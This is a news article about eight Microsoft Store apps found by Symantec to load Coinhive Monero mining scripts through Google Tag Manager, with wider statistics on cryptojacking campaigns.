Cryptojacking Coinhive Miners Land on the Microsoft Store For the First Time

Fibo Quantum

A batch of eight potentially unwanted applications (PUAs) were found on the Microsoft Store dropping malicious Monero (XMR) Coinhive cryptomining scripts, delivered with the help of Google’s legitimate Google Tag Manager (GTM) library.

This is especially interesting given that GTM is a tag management system designed by Google to help developers inject JavaScript and HTML content within their apps for tracking and analytics purposes.

Microsoft removed the Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search apps that were developed by three developers (i.e.., DigiDream, 1clean, and Findoofrom) after Symantec’s report, the company who discovered the eight apps in Redmond’s store.

Cryptojacking apps in the Microsoft Store
Cryptojacking apps in the Microsoft Store

As Symantec’s Yuanjing Guo and Tommy Dong stated, the risky apps were found on “on Windows 10, including Windows 10 S Mode” and they were added to the Microsoft Store between April and December 2018, most of them landing in the store at the end of the last year.

While there is no way to know the exact number of installs for each app since Microsoft doesn’t share that info on the Microsoft Store entries as Google’s Play Store does, it is quite obvious that they’ve either been installed on numerous devices or had a large number of fake ratings given that “there were almost 1,900 ratings posted.”

The Symantec researchers explain that:

As soon as the apps are downloaded and launched, they fetch a coin-mining JavaScript library by triggering Google Tag Manager (GTM) in their domain servers. The mining script then gets activated and begins using the majority of the computer’s CPU cycles to mine Monero for the operators. Although these apps appear to provide privacy policies, there is no mention of coin mining on their descriptions on the app store.

After snooping on the network traffic between the apps and their command-and-control servers, Symantec was able to find out that they were using a variant of the JavaScript-based Coinhive miner script, a well-known tool used by threat actors as part of cryptojacking campaigns since September 2017 when it was launched.

Seeing that cryptomining scripts will most of the time run on the compromised machines without any sort of resource usage controls, it is very possible that the Windows systems where these particular apps landed were experiencing serious performance issues because of continuously using all CPU resources to mine Monero for their masters.

While cryptocurrency miners are not malicious tools on their own, they are seen as malware when used by threat actors to secretly mine for crypto coins in the background stealing processing resources from unaware victims’ devices.

As part of cryptojacking malware campaigns, criminals will collect all the cryptocurrency surreptitiously mined using compromised systems and send it crypto wallets which they control. 

Cryptojacking on the rise

According to a report by Check Point Research, cryptominers infected roughly ten times more companies during 2018 than ransomware did, overtaking previous apex predator on the malware scene.

However, only one in five security professionals were able to detect that their company’s systems have been affected by a malware attack while the cryptocurrency mining scripts were silently running in the background.

The trend is even more noticeable when taking into consideration that the apps Microsoft just removed from the Microsoft Store are the first of their kind targeting this platform.

Linux users are also actively targeted by cryptojacking campaigns, with a new Backdoor Trojan they dubbed SpeakUp currently targeting servers running six different Linux distributions and Apple’s macOS, and a new coinminer malware strain using the XMR-Stak Cryptonight cryptocurrency miner having been detected this month.

Palo Alto Networks’ researchers previously stated during the summer of 2018 that criminal groups have mined an approximate total of 798,613.33 Monero coins (XMR) using malware on infected devices, earning them over $108 million in US currency, which represents around 5% of all the Monero currently in circulation.

Researchers from the Universidad Carlos III de Madrid and the King’s College London reached a similar conclusion confirming Palo Alto Networks’ results at the start of 2019, concluding that criminals have mined (at least) 4.3% of the total number of Monero coins.